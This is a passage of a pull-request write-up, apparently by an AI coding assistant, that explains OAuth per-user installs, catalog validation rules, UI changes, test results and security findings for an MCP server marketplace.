{ type: 'oauth', oauth_mode: 'per_user' }
```

`oauth_mode` is **fixed in code, not defaulted**, so no catalog edit can turn one person's consent into everybody's access to their account.

## Catalog fields added

An optional `oauth:` block. **Every entry states none of it** — discovery covers all 42 — and a test holds that, to be deleted by the PR that adds the first justified exception.

| Field | Reaches | Why it is safe to check in |
|---|---|---|
| `scope` | the authorization request's `scope`, and the DCR registration | Non-secret; visible in the address bar during the flow. Discovery covers it only when resource metadata publishes `scopes_supported` *and* the client is registered dynamically. |
| `client_id` | the authorization request's `client_id` | Public by construction (RFC 6749 §2.2). For servers pre-registering one public client instead of running DCR. |
| `dcr_mode` | whether registration may fall back to an unadvertised `/register` | A policy flag. No secret, no URL. |
| `compatibility_mode` | whether AS metadata may be fetched from the MCP origin | A policy flag, for servers predating RFC 9728. |

**Deliberately absent**, and the schema is `.strict()` so they fail the load rather than being dropped silently:

- **`client_secret`** — the file is public and byte-identical for every tenant, so a secret in it is a published secret shared by everyone.
- **`authorization_url` / `token_url`** — these are where an authorization code and a client credential get *sent*. A stale one does not fail closed; it delivers a live grant to whatever now answers at that hostname. They are also the facts discovery is most reliable about. Declaring them would make this file responsible for the one part of the flow that must not drift, with nothing sweeping it.

A test greps the whole shipped file for secret-shaped keys.

## What connect does per outcome

The probe still runs on every connect whatever the entry states, and disagreement with the file is still logged at `warn`.

| Probe | Before | Now |
|---|---|---|
| handshake completed | install, `auth: none` | unchanged |
| **OAuth challenge** | **refused** | **install `{ type: 'oauth', oauth_mode: 'per_user' }`, no token** |
| non-OAuth 401/403 | refused, "requires authentication" | refused, "needs an API key" — says *which* kind |
| nothing identifiable | refused | unchanged |

## Reuse had to change, and the old comment said so

`isInstallOf` hardcoded `auth.type === 'none'`, with a note that the first installable credential-bearing entry would invert it. It now compares against the auth block *this connect just derived*.

Token fields are excluded from that comparison. The OAuth flow never writes the server row — tokens live in `user_mcp_oauth_tokens` keyed by `(user_id, mcp_server_id)` — but the `mcp-servers` read hook hydrates the caller's own token onto the payload reuse inspects. Comparing them would make every successful sign-in look like drift and mint a duplicate row, and only for users who had successfully authenticated.

The comparison is by *difference*, not a named-fields list: an unrecognised key is a mismatch, so a field later added to `MCPAuth` is excluded from reuse until someone decides otherwise. A row whose owner has since set `oauth_token_url` is not reused.

## UI

Reuses the existing unauthenticated-MCP vocabulary. After connecting, the user lands in the session and sees the `MCPServerPill` state that already exists: red, `LoginOutlined`, *"isn't connected. Click to connect."*, computed by `mcpServerNeedsAuth`. Clicking starts the same OAuth flow.

The card gains a `sign-in` readiness (same icon) separate from `ready`, because a card promising "no account needed" over a server that wants your Notion login is what that vocabulary exists to prevent. "Hide account-only" becomes "Hide key-only" — it now removes only API-key entries.

---

# Part 2 — everything installable

## The two removed entries

`com.auth0/mcp` and `io.github.ClickHouse/mcp-clickhouse` were pure metadata: no `remote_url`, no `transport`, and no package or command data either, because the details describing how to run them lived in the registry mirror #2344 deleted. They rendered a card, a category, a disclosure and a Connect affordance, and every route out was a refusal — for admins too.

## The loader now refuses an entry it cannot serve

The defect was not the two rows; it was that the file could express an unusable entry and **nothing objected** — not the schema, not the loader, not a test.

The predicate is connect's own condition, `assertConnectableEntry`: **an entry must name a `remote_url` and must not declare `stdio`.**

It **fails the whole file**, matching duplicate names and duplicate ranks. That is safe, and I checked the premise rather than assuming it: **the loader does not run at boot.** `createMCPCatalogService()` registers without loading; `loadCatalog` runs lazily inside `find`/`get`, and `catalog.ts` deliberately does not cache a rejection so the process recovers. A malformed file fails marketplace requests, not the daemon. The file is checked in and CI parses it, so a curator finds out before users do.

The message names the entry, what is missing, and what to do — which matters, since a dozen hand-written entries are about to meet it:

```
curated.yaml entry com.auth0/mcp names no remote_url, so nothing could ever
install it. Add the vendor's remote MCP endpoint (and transport:
"streamable-http" or "sse" if it is not the default), or remove the entry.
```

Verified by feeding the exact deleted entry back in.

**Connect keeps its own check.** The loader constrains a checked-in file; connect authorizes a request, and members-remote-only is a security boundary. A boundary that held only because an input file was validated somewhere else is one bad catalog source from not holding.

## Why this is not a smaller version of auto mode

Recording this so it is not "fixed" later by adding local support casually: installing a package-based server means **executing third-party code on the executor host, next to every session.** That is a supply-chain decision, not a credential one, and it is exactly the risk the members-remote-only rule exists to contain. Removing these entries is not deferring a small feature; it is declining to open that door by accident.

Whatever eventually offers local servers needs fields describing how the server is run — which these entries never had — and has to answer the supply-chain question first. So this rule is not one to relax when local support lands; it is one to replace with a rule that knows what it is admitting.

## The "Runs locally" state: deleted as a concept, kept as a guard

It read *"This server runs locally rather than over the network. An admin configures it directly."* — describing a capability that does not exist, since the entries carried no data any admin could have used.

The copy goes. The **branch** stays, because `MCPCatalogEntry.remote_url` is optional in the type and entries arrive over the wire — the UI does not get to assume the loader that produced them was this one, and deleting the branch would fall through to "Not checked yet" and offer a Connect button over nothing. It now says the entry **cannot be installed**, which is true whatever produced it, instead of describing a working feature. If local servers are ever offered they arrive with fields describing how the server is run, and an affordance designed against those — not this string.

`has_remote` is now invariantly `true`. Kept as a *derivation* rather than hardcoded: it states why a served entry is dialable, and it is what consumers read instead of re-deriving it.

---

# Interactions checked

**#2373 (member role floor) — would not refuse this flow.** It floors `mcp-servers/oauth-start` at `member`, and `isMcpGrantSubjectEntitled('member', 'per_user') === true`. Because `oauth_mode` is fixed at `per_user`, a legitimate member can complete it. The converse is the near-miss: `('member', 'shared') === false`, so had this defaulted to `shared`, every member install would have been unfinishable. Connect mints no credential, so it is not in `MCP_CAPABILITY_ISSUING_SERVICE_PATHS`.

**#2193 — see finding 1. This is the one thing I would not ship without.**

# Verification

`turbo run typecheck` 22/22. `biome check --error-on-warnings .` clean.

| Suite | Baseline (clean tree) | With this change |
|---|---|---|
| `@agor/core` | 566 failed, 3137 passed | 566 failed, **3153** passed |
| `agor-daemon` | 217 failed, 2614 passed | 217 failed, **2626** passed |
| `agor-ui` (Marketplace + MCPServer + mcpAuth) | 104 passed | **116** passed |

Identical failure counts; +28 passing. **Those pre-existing failures fail on THIS HOST**, from the known `EACCES: /home/agorpg/.agor/config.yaml` (that path is a character device owned by `nobody` here). The full `agor-ui` suite flakes under parallel load with a different set of 1–7 timeouts each run, none in Marketplace; the changed areas pass 116/116 in isolation.

New tests: an OAuth entry installs a row the existing flow can complete; it carries no token and nothing that routes one; `per_user` cannot be overridden; stated settings flow through; an authenticated install is reused; a row with `oauth_token_url`/`oauth_authorization_url`/`oauth_client_secret` set afterwards is not; the loader refuses a secret, a bad mode, an empty block, an entry with no endpoint, and a `stdio` entry; the shipped catalog names an endpoint for every entry and declares no `stdio`.

The security test is written from the attacker's side: it posts `url`, `transport: 'stdio'`, `command`, `args`, `env`, `headers`, a hostile `auth` block with attacker token/authorization endpoints, `oauth_mode: 'shared'`, `scope: 'global'`, `owner_user_id`, `catalog_entry_name` and `source`, then asserts the row is built from the catalog entry alone, that the probe hit the catalog URL exactly once and never the supplied one (SSRF), and that a hostile payload cannot steer reuse onto someone else's row.

# Findings

**1. Shipping this before #2193 is unsafe for OpenCode — I would gate on it.**

Unauthenticated OAuth rows go from rare to common here, and `scoping.ts` passes them to the agent without a token. Verified in source:

| Provider | Warned? | Runtime |
|---|---|---|
| Claude | yes | server in config without `Authorization`; its tools are missing |
| Codex | yes | same |
| Gemini | **no** | same, silently |
| Copilot | **no** | same, silently |
| **OpenCode** | throws | **the session fails to start** |

`opencode-tool.ts` throws `Attached MCP server ${name} did not resolve a usable Authorization header` when `auth.type !== 'none'` and no bearer resolves. OpenCode is in `AVAILABLE_AGENTS`, so the connect drawer offers it — pick it with an OAuth entry and you get a session that cannot start until you authenticate. The path exists today; this makes it common. #2193 replaces all five behaviours with "leave it out and tell the user", which is the right fix and not one to duplicate here.

Options if #2193 will not land first: hold this, or drop OpenCode from the connect drawer for OAuth entries.

**2. `auth_type` is now load-bearing for one more thing.** It decides the card's affordance before the probe runs, so an entry stating `none` that is actually behind OAuth shows "No account needed" and then installs an OAuth row. Correct, but the card was momentarily wrong. The probe-disagreement `warn` is still the only detector.

**3. Not a defect, but it cost time:** `packages/core`'s vitest resolves `@agor/core/types` to built `dist/`, not `src/`. A newly exported constant is invisible to tests until `tsup` runs, surfacing as `z.enum(undefined)`. Also `pnpm --filter @agor/core build` alone fails on `src/git/exec.ts` because `@agor/git` is unbuilt; through `turbo` it passes. Neither is touched here.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
